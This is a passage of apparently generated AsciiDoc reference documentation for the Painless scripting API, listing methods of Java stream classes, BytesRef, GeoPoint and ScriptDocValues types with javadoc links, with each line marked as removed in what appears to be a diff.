DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream$Builder.html#build()[build]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntStream]] -==== IntStream -* static IntStream.Builder {java11-javadoc}/java.base/java/util/stream/IntStream.html#builder()[builder]() -* static IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#concat(java.util.stream.IntStream,java.util.stream.IntStream)[concat](IntStream, IntStream) -* static IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#empty()[empty]() -* static IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#of(int%5B%5D)[of](int[]) -* static IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#range(int,int)[range](int, int) -* static IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#rangeClosed(int,int)[rangeClosed](int, int) -* boolean {java11-javadoc}/java.base/java/util/stream/IntStream.html#allMatch(java.util.function.IntPredicate)[allMatch](IntPredicate) -* boolean {java11-javadoc}/java.base/java/util/stream/IntStream.html#anyMatch(java.util.function.IntPredicate)[anyMatch](IntPredicate) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#asDoubleStream()[asDoubleStream]() -* LongStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#asLongStream()[asLongStream]() -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/IntStream.html#average()[average]() -* Stream {java11-javadoc}/java.base/java/util/stream/IntStream.html#boxed()[boxed]() -* void {java11-javadoc}/java.base/java/util/stream/BaseStream.html#close()[close]() -* def {java11-javadoc}/java.base/java/util/stream/IntStream.html#collect(java.util.function.Supplier,java.util.function.ObjIntConsumer,java.util.function.BiConsumer)[collect](Supplier, ObjIntConsumer, BiConsumer) -* long {java11-javadoc}/java.base/java/util/stream/IntStream.html#count()[count]() -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#distinct()[distinct]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#filter(java.util.function.IntPredicate)[filter](IntPredicate) -* OptionalInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#findAny()[findAny]() -* OptionalInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#findFirst()[findFirst]() -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#flatMap(java.util.function.IntFunction)[flatMap](IntFunction) -* void {java11-javadoc}/java.base/java/util/stream/IntStream.html#forEach(java.util.function.IntConsumer)[forEach](IntConsumer) -* void {java11-javadoc}/java.base/java/util/stream/IntStream.html#forEachOrdered(java.util.function.IntConsumer)[forEachOrdered](IntConsumer) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/stream/BaseStream.html#isParallel()[isParallel]() -* PrimitiveIterator.OfInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#iterator()[iterator]() -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#limit(long)[limit](long) -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#map(java.util.function.IntUnaryOperator)[map](IntUnaryOperator) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#mapToDouble(java.util.function.IntToDoubleFunction)[mapToDouble](IntToDoubleFunction) -* LongStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#mapToLong(java.util.function.IntToLongFunction)[mapToLong](IntToLongFunction) -* Stream {java11-javadoc}/java.base/java/util/stream/IntStream.html#mapToObj(java.util.function.IntFunction)[mapToObj](IntFunction) -* OptionalInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#max()[max]() -* OptionalInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#min()[min]() -* boolean {java11-javadoc}/java.base/java/util/stream/IntStream.html#noneMatch(java.util.function.IntPredicate)[noneMatch](IntPredicate) -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#peek(java.util.function.IntConsumer)[peek](IntConsumer) -* OptionalInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#reduce(java.util.function.IntBinaryOperator)[reduce](IntBinaryOperator) -* int {java11-javadoc}/java.base/java/util/stream/IntStream.html#reduce(int,java.util.function.IntBinaryOperator)[reduce](int, IntBinaryOperator) -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#sequential()[sequential]() -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#skip(long)[skip](long) -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#sorted()[sorted]() -* Spliterator.OfInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#spliterator()[spliterator]() -* int {java11-javadoc}/java.base/java/util/stream/IntStream.html#sum()[sum]() -* IntSummaryStatistics {java11-javadoc}/java.base/java/util/stream/IntStream.html#summaryStatistics()[summaryStatistics]() -* int[] {java11-javadoc}/java.base/java/util/stream/IntStream.html#toArray()[toArray]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#unordered()[unordered]() - - -[[painless-api-reference-shared-IntStream-Builder]] -==== IntStream.Builder -* void {java11-javadoc}/java.base/java/util/function/IntConsumer.html#accept(int)[accept](int) -* IntStream.Builder {java11-javadoc}/java.base/java/util/stream/IntStream$Builder.html#add(int)[add](int) -* IntConsumer {java11-javadoc}/java.base/java/util/function/IntConsumer.html#andThen(java.util.function.IntConsumer)[andThen](IntConsumer) -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream$Builder.html#build()[build]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongStream]] -==== LongStream -* static LongStream.Builder {java11-javadoc}/java.base/java/util/stream/LongStream.html#builder()[builder]() -* static LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#concat(java.util.stream.LongStream,java.util.stream.LongStream)[concat](LongStream, LongStream) -* static LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#empty()[empty]() -* static LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#of(long%5B%5D)[of](long[]) -* static LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#range(long,long)[range](long, long) -* static LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#rangeClosed(long,long)[rangeClosed](long, long) -* boolean {java11-javadoc}/java.base/java/util/stream/LongStream.html#allMatch(java.util.function.LongPredicate)[allMatch](LongPredicate) -* boolean {java11-javadoc}/java.base/java/util/stream/LongStream.html#anyMatch(java.util.function.LongPredicate)[anyMatch](LongPredicate) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#asDoubleStream()[asDoubleStream]() -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/LongStream.html#average()[average]() -* Stream {java11-javadoc}/java.base/java/util/stream/LongStream.html#boxed()[boxed]() -* void {java11-javadoc}/java.base/java/util/stream/BaseStream.html#close()[close]() -* def {java11-javadoc}/java.base/java/util/stream/LongStream.html#collect(java.util.function.Supplier,java.util.function.ObjLongConsumer,java.util.function.BiConsumer)[collect](Supplier, ObjLongConsumer, BiConsumer) -* long {java11-javadoc}/java.base/java/util/stream/LongStream.html#count()[count]() -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#distinct()[distinct]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#filter(java.util.function.LongPredicate)[filter](LongPredicate) -* OptionalLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#findAny()[findAny]() -* OptionalLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#findFirst()[findFirst]() -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#flatMap(java.util.function.LongFunction)[flatMap](LongFunction) -* void {java11-javadoc}/java.base/java/util/stream/LongStream.html#forEach(java.util.function.LongConsumer)[forEach](LongConsumer) -* void {java11-javadoc}/java.base/java/util/stream/LongStream.html#forEachOrdered(java.util.function.LongConsumer)[forEachOrdered](LongConsumer) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/stream/BaseStream.html#isParallel()[isParallel]() -* PrimitiveIterator.OfLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#iterator()[iterator]() -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#limit(long)[limit](long) -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#map(java.util.function.LongUnaryOperator)[map](LongUnaryOperator) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#mapToDouble(java.util.function.LongToDoubleFunction)[mapToDouble](LongToDoubleFunction) -* IntStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#mapToInt(java.util.function.LongToIntFunction)[mapToInt](LongToIntFunction) -* Stream {java11-javadoc}/java.base/java/util/stream/LongStream.html#mapToObj(java.util.function.LongFunction)[mapToObj](LongFunction) -* OptionalLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#max()[max]() -* OptionalLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#min()[min]() -* boolean {java11-javadoc}/java.base/java/util/stream/LongStream.html#noneMatch(java.util.function.LongPredicate)[noneMatch](LongPredicate) -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#peek(java.util.function.LongConsumer)[peek](LongConsumer) -* OptionalLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#reduce(java.util.function.LongBinaryOperator)[reduce](LongBinaryOperator) -* long {java11-javadoc}/java.base/java/util/stream/LongStream.html#reduce(long,java.util.function.LongBinaryOperator)[reduce](long, LongBinaryOperator) -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#sequential()[sequential]() -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#skip(long)[skip](long) -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#sorted()[sorted]() -* Spliterator.OfLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#spliterator()[spliterator]() -* long {java11-javadoc}/java.base/java/util/stream/LongStream.html#sum()[sum]() -* LongSummaryStatistics {java11-javadoc}/java.base/java/util/stream/LongStream.html#summaryStatistics()[summaryStatistics]() -* long[] {java11-javadoc}/java.base/java/util/stream/LongStream.html#toArray()[toArray]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#unordered()[unordered]() - - -[[painless-api-reference-shared-LongStream-Builder]] -==== LongStream.Builder -* void {java11-javadoc}/java.base/java/util/function/LongConsumer.html#accept(long)[accept](long) -* LongStream.Builder {java11-javadoc}/java.base/java/util/stream/LongStream$Builder.html#add(long)[add](long) -* LongConsumer {java11-javadoc}/java.base/java/util/function/LongConsumer.html#andThen(java.util.function.LongConsumer)[andThen](LongConsumer) -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream$Builder.html#build()[build]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Stream]] -==== Stream -* static Stream.Builder {java11-javadoc}/java.base/java/util/stream/Stream.html#builder()[builder]() -* static Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#concat(java.util.stream.Stream,java.util.stream.Stream)[concat](Stream, Stream) -* static Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#empty()[empty]() -* static Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#of(java.lang.Object%5B%5D)[of](def[]) -* boolean {java11-javadoc}/java.base/java/util/stream/Stream.html#allMatch(java.util.function.Predicate)[allMatch](Predicate) -* boolean {java11-javadoc}/java.base/java/util/stream/Stream.html#anyMatch(java.util.function.Predicate)[anyMatch](Predicate) -* void {java11-javadoc}/java.base/java/util/stream/BaseStream.html#close()[close]() -* def {java11-javadoc}/java.base/java/util/stream/Stream.html#collect(java.util.stream.Collector)[collect](Collector) -* def {java11-javadoc}/java.base/java/util/stream/Stream.html#collect(java.util.function.Supplier,java.util.function.BiConsumer,java.util.function.BiConsumer)[collect](Supplier, BiConsumer, BiConsumer) -* long {java11-javadoc}/java.base/java/util/stream/Stream.html#count()[count]() -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#distinct()[distinct]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#filter(java.util.function.Predicate)[filter](Predicate) -* Optional {java11-javadoc}/java.base/java/util/stream/Stream.html#findAny()[findAny]() -* Optional {java11-javadoc}/java.base/java/util/stream/Stream.html#findFirst()[findFirst]() -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#flatMap(java.util.function.Function)[flatMap](Function) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/Stream.html#flatMapToDouble(java.util.function.Function)[flatMapToDouble](Function) -* IntStream {java11-javadoc}/java.base/java/util/stream/Stream.html#flatMapToInt(java.util.function.Function)[flatMapToInt](Function) -* LongStream {java11-javadoc}/java.base/java/util/stream/Stream.html#flatMapToLong(java.util.function.Function)[flatMapToLong](Function) -* void {java11-javadoc}/java.base/java/util/stream/Stream.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* void {java11-javadoc}/java.base/java/util/stream/Stream.html#forEachOrdered(java.util.function.Consumer)[forEachOrdered](Consumer) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/stream/BaseStream.html#isParallel()[isParallel]() -* Iterator {java11-javadoc}/java.base/java/util/stream/BaseStream.html#iterator()[iterator]() -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#limit(long)[limit](long) -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#map(java.util.function.Function)[map](Function) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/Stream.html#mapToDouble(java.util.function.ToDoubleFunction)[mapToDouble](ToDoubleFunction) -* IntStream {java11-javadoc}/java.base/java/util/stream/Stream.html#mapToInt(java.util.function.ToIntFunction)[mapToInt](ToIntFunction) -* LongStream {java11-javadoc}/java.base/java/util/stream/Stream.html#mapToLong(java.util.function.ToLongFunction)[mapToLong](ToLongFunction) -* Optional {java11-javadoc}/java.base/java/util/stream/Stream.html#max(java.util.Comparator)[max](Comparator) -* Optional {java11-javadoc}/java.base/java/util/stream/Stream.html#min(java.util.Comparator)[min](Comparator) -* boolean {java11-javadoc}/java.base/java/util/stream/Stream.html#noneMatch(java.util.function.Predicate)[noneMatch](Predicate) -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#peek(java.util.function.Consumer)[peek](Consumer) -* Optional {java11-javadoc}/java.base/java/util/stream/Stream.html#reduce(java.util.function.BinaryOperator)[reduce](BinaryOperator) -* def {java11-javadoc}/java.base/java/util/stream/Stream.html#reduce(java.lang.Object,java.util.function.BinaryOperator)[reduce](def, BinaryOperator) -* def {java11-javadoc}/java.base/java/util/stream/Stream.html#reduce(java.lang.Object,java.util.function.BiFunction,java.util.function.BinaryOperator)[reduce](def, BiFunction, BinaryOperator) -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#sequential()[sequential]() -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#skip(long)[skip](long) -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#sorted()[sorted]() -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#sorted(java.util.Comparator)[sorted](Comparator) -* Spliterator {java11-javadoc}/java.base/java/util/stream/BaseStream.html#spliterator()[spliterator]() -* def[] {java11-javadoc}/java.base/java/util/stream/Stream.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/stream/Stream.html#toArray(java.util.function.IntFunction)[toArray](IntFunction) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#unordered()[unordered]() - - -[[painless-api-reference-shared-Stream-Builder]] -==== Stream.Builder -* void {java11-javadoc}/java.base/java/util/function/Consumer.html#accept(java.lang.Object)[accept](def) -* Stream.Builder {java11-javadoc}/java.base/java/util/stream/Stream$Builder.html#add(java.lang.Object)[add](def) -* Consumer {java11-javadoc}/java.base/java/util/function/Consumer.html#andThen(java.util.function.Consumer)[andThen](Consumer) -* Stream {java11-javadoc}/java.base/java/util/stream/Stream$Builder.html#build()[build]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-apache-lucene-util"] -=== Shared API for package org.apache.lucene.util -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-BytesRef]] -==== BytesRef -* byte[] bytes -* int length -* int offset -* boolean bytesEquals(BytesRef) -* int {java11-javadoc}/java.base/java/lang/Comparable.html#compareTo(java.lang.Object)[compareTo](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* null utf8ToString() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-common-geo"] -=== Shared API for package org.elasticsearch.common.geo -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-GeoPoint]] -==== GeoPoint -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* double getLat() -* double getLon() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-index-fielddata"] -=== Shared API for package org.elasticsearch.index.fielddata -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-ScriptDocValues-Booleans]] -==== ScriptDocValues.Booleans -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Boolean get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* boolean getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptDocValues-BytesRefs]] -==== ScriptDocValues.BytesRefs -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* BytesRef get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* BytesRef getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptDocValues-Dates]] -==== ScriptDocValues.Dates -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* JodaCompatibleZonedDateTime get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* JodaCompatibleZonedDateTime getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptDocValues-Doubles]] -==== ScriptDocValues.Doubles -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Double get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* double getValue() -* Map groupBy(Function) -* int 